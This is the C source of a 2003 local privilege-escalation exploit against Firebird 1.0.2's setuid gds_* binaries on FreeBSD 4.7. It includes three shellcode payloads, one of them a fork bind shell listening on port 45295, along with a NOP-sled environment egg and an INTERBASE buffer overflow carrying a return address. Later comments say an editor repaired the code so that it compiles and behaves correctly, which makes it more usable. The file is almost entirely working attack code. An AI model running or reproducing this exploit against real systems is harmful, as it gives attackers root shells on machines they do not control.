# Title : Firebird 1.0.2 FreeBSD 4.7-RELEASE Local Root Exploit
# Published : 2003-05-12
# Author : bob
/* DSR-firebird.c
-------------------------------
Tested on: Firebird 1.0.2 FreeBSD 4.7-RELEASE
This is proof-of-concept code. Note that the sample run below lists a different return address per target, while the program itself uses a single address (0xbfbff743) for all three targets -- see the usage text and main().
bash-2.05a$ ./DSR-firebird
( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )
( ( by - bob@dtors.net ) )
----------------------------------------------------
Usage: ./DSR-firebird <target#>
Targets:
1. [0xbfbff75d] - gds_inet_server
2. [0xbfbff75c] - gds_lock_mgr
3. [0xbfbff75e] - gds_drop
bash-2.05a$
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define LOCK "/usr/local/firebird/bin/gds_lock_mgr"
#define DROP "/usr/local/firebird/bin/gds_drop"
#define INET "/usr/local/firebird/bin/gds_inet_server"
#define LEN 1056
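/*
 * Payloads, one per target binary.  All three are FreeBSD/i386 syscall stubs
 * (int 0x80).  Each opens with the same 10-byte sequence that the author's
 * comment labels "setuid[firebird]"; the pushed immediate is 0x5a (90), which
 * matches the "Setuid [90]" banner main() prints.  dropcode and inetcode are
 * byte-for-byte identical: after the setuid stub they push "//sh" and "/bin"
 * (visible as 2f 2f 73 68 / 2f 62 69 6e) and, presumably, execve that path
 * before exiting.  lockcode instead carries what the author credits as
 * eSDee's fork() bind shell; the 16-bit port pushed at "\x66\x68\xb0\xef" is
 * 0xb0ef in network byte order, i.e. 45295, the port main() announces.
 *
 * In the original listing every "\x" escape had lost its backslash (the bytes
 * read as the ASCII text "x31xc0..."), and a wrapped comment left a stray
 * identifier inside the lockcode initializer, so none of this compiled.  The
 * escapes are restored here from the hex digits that survived; no byte has
 * been added, removed or reordered.
 *
 * The arrays stay plain (non-const) char[] on purpose: decide() returns them
 * as char * and main() selects the binary to exec by comparing that pointer
 * against these arrays by identity.
 */
char dropcode[] =
    "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"   /* setuid(90), per author */
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"   /* push "//sh", then "/bin"... */
    "\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"   /* ...ebx = "/bin//sh" */
    "\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";      /* syscall 0x3b, then exit */

char inetcode[] =
    "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"   /* identical to dropcode */
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
    "\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
    "\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

char lockcode[] =
    "\x31\xc0\x31\xdb\xb0\x02\xcd\x80"           /* syscall 2 (fork per author) */
    "\x39\xc3\x75\x06\x31\xc0\xb0\x01\xcd\x80"   /* one side exits, other continues */
    "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"   /* setuid[firebird] by bob */
    "\x31\xc0\x31\xdb\x53\xb3\x06\x53"           /* fork() bindshell by eSDee */
    "\xb3\x01\x53\xb3\x02\x53\x54\xb0"
    "\x61\xcd\x80\x89\xc7\x31\xc0\x50"
    "\x50\x50\x66\x68\xb0\xef\xb7\x02"           /* port 0xb0ef = 45295 */
    "\x66\x53\x89\xe1\x31\xdb\xb3\x10"
    "\x53\x51\x57\x50\xb0\x68\xcd\x80"
    "\x31\xdb\x39\xc3\x74\x06\x31\xc0"
    "\xb0\x01\xcd\x80\x31\xc0\x50\x57"
    "\x50\xb0\x6a\xcd\x80\x31\xc0\x31"
    "\xdb\x50\x89\xe1\xb3\x01\x53\x89"
    "\xe2\x50\x51\x52\xb3\x14\x53\x50"
    "\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
    "\x57\x50\xb0\x1e\xcd\x80\x89\xc6"
    "\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
    "\x39\xc3\x75\x44\x31\xc0\x57\x50"
    "\xb0\x06\xcd\x80\x31\xc0\x50\x56"
    "\x50\xb0\x5a\xcd\x80\x31\xc0\x31"
    "\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
    "\x80\x31\xc0\x43\x53\x56\x50\xb0"
    "\x5a\xcd\x80\x31\xc0\x50\x68\x2f"           /* "/bin//sh" again, as above */
    "\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x50\x54\x53\x50\xb0\x3b"
    "\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
    "\x31\xc0\x56\x50\xb0\x06\xcd\x80"
    "\xeb\x9a";                                  /* short jump back to accept loop */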
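/*
 * Map the target number from the command line to its payload.
 *
 * Returns one of the payload arrays themselves (inetcode, lockcode or
 * dropcode), never a copy: main() chooses which binary to exec by comparing
 * the returned pointer against those arrays by identity.
 *
 * Anything other than "1", "2" or "3" -- including a NULL argument -- is a
 * usage error.  The original silently called exit(0) here, which made a
 * bad target indistinguishable from success to a calling shell; it now
 * reports the problem on stderr and exits non-zero.  Does not return on
 * error.
 */
char *decide(char *string)
{
    if (string != NULL) {
        if (strcmp(string, "1") == 0)
            return inetcode;
        if (strcmp(string, "2") == 0)
            return lockcode;
        if (strcmp(string, "3") == 0)
            return dropcode;
    }
    fprintf(stderr, "Unknown target '%s' (expected 1, 2 or 3)\n",
            string != NULL ? string : "(null)");
    exit(EXIT_FAILURE);
}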
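/* Print the banner and usage text to stdout. */
static void usage(const char *prog)
{
    printf("( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )\n");
    printf("( ( by - bob@dtors.net ) )\n");
    printf("----------------------------------------------------\n\n");
    printf("Usage: %s <target#> \n", prog);
    printf("Targets:\n");
    printf("1. [0xbfbff743] - gds_inet_server\n");
    printf("2. [0xbfbff743] - gds_lock_mgr\n");
    printf("3. [0xbfbff743] - gds_drop\n");
    printf("\nwww.dtors.net\n");
}

/*
 * Fill egg[0..len-1] with "EGG=", a NOP (0x90) sled, and the payload placed
 * flush against the terminating NUL, so that a return address landing
 * anywhere in the sled slides into the payload.  The result is a valid
 * NUL-terminated C string of len-1 characters.
 *
 * Returns 0 on success, -1 if "EGG=" + payload + NUL does not fit in len.
 */
static int build_egg(char *egg, size_t len, const char *payload)
{
    const size_t prefix = 4;                 /* strlen("EGG=") */
    size_t plen = strlen(payload);

    if (len < prefix + plen + 1)
        return -1;
    memset(egg, 0x90, len - 1);
    memcpy(egg, "EGG=", prefix);
    memcpy(egg + (len - 1 - plen), payload, plen);
    egg[len - 1] = '\0';
    return 0;
}

/*
 * Fill buf with the INTERBASE value: LEN-4 filler bytes ('A'), the return
 * address as 4 little-endian bytes (the target is i386), and a NUL at
 * buf[LEN].  buf must therefore hold LEN + 1 bytes -- the original used a
 * LEN-byte array and stored the NUL one past its end.
 */
static void build_trigger(char *buf, unsigned long ret)
{
    memset(buf, 0x41, LEN);
    buf[LEN - 4] = (char)(ret & 0xff);
    buf[LEN - 3] = (char)((ret >> 8) & 0xff);
    buf[LEN - 2] = (char)((ret >> 16) & 0xff);
    buf[LEN - 1] = (char)((ret >> 24) & 0xff);
    buf[LEN] = '\0';
}

/*
 * Entry point: build the EGG and INTERBASE environment variables, then exec
 * the selected setuid gds_* binary with that environment.
 *
 *   EGG       = "EGG=" + NOP sled + payload           (1023 chars + NUL)
 *   INTERBASE = 1052 x 'A' + return address 0xbfbff743 (LEN chars + NUL)
 *
 * The same return address is used for all three targets (the header
 * comment's sample run shows per-target values that this code never used).
 * It presumably points into the EGG sled on the target's stack under
 * FreeBSD 4.7/i386; it is environment-layout specific and is not expected
 * to work anywhere else without adjustment.
 *
 * Fixes relative to the original listing, all of which were undefined
 * behaviour or garbled text: the INTERBASE buffer was NUL-terminated one
 * byte past its end; the EGG string was "terminated" with a space instead
 * of NUL, so putenv() read past the array; "%x" was used to print an
 * unsigned long; every "\n" had lost its backslash and several literals
 * were split across lines; and a failed execl() returned 0.
 *
 * Exit status: 0 after printing usage, 1 if the environment or exec could
 * not be set up; on success execl() does not return.
 */
int main(int argc, char **argv)
{
    unsigned long ret = 0xbfbff743;
    char *selectcode;
    char buffer[LEN + 1];
    char egg[1024];
    const char *path;

    if (argc < 2) {
        usage(argc > 0 ? argv[0] : "DSR-firebird");
        exit(0);
    }

    selectcode = decide(argv[1]);

    if (build_egg(egg, sizeof egg, selectcode) != 0) {
        fprintf(stderr, "payload (%zu bytes) does not fit in EGG\n",
                strlen(selectcode));
        return 1;
    }
    /* putenv() keeps a pointer to egg rather than copying it; that is fine
     * here only because we exec or return from main without touching it. */
    if (putenv(egg) != 0) {
        perror("putenv");
        return 1;
    }

    build_trigger(buffer, ret);
    if (setenv("INTERBASE", buffer, 1) != 0) {
        perror("setenv");
        return 1;
    }

    fprintf(stdout, "Return Address: 0x%lx\n", ret);
    fprintf(stdout, "Buffer Size: %d\n", LEN);
    fprintf(stdout, "Setuid [90]\n");

    if (selectcode == inetcode) {
        path = INET;
    } else if (selectcode == lockcode) {
        printf("\nShell is on port 45295\nExploit will hang!\n");
        path = LOCK;
    } else {
        path = DROP;            /* decide() exits on any other value */
    }

    execl(path, path, (char *)NULL);
    /* Only reached if the exec itself failed (missing binary, no exec bit). */
    perror(path);
    return 1;
}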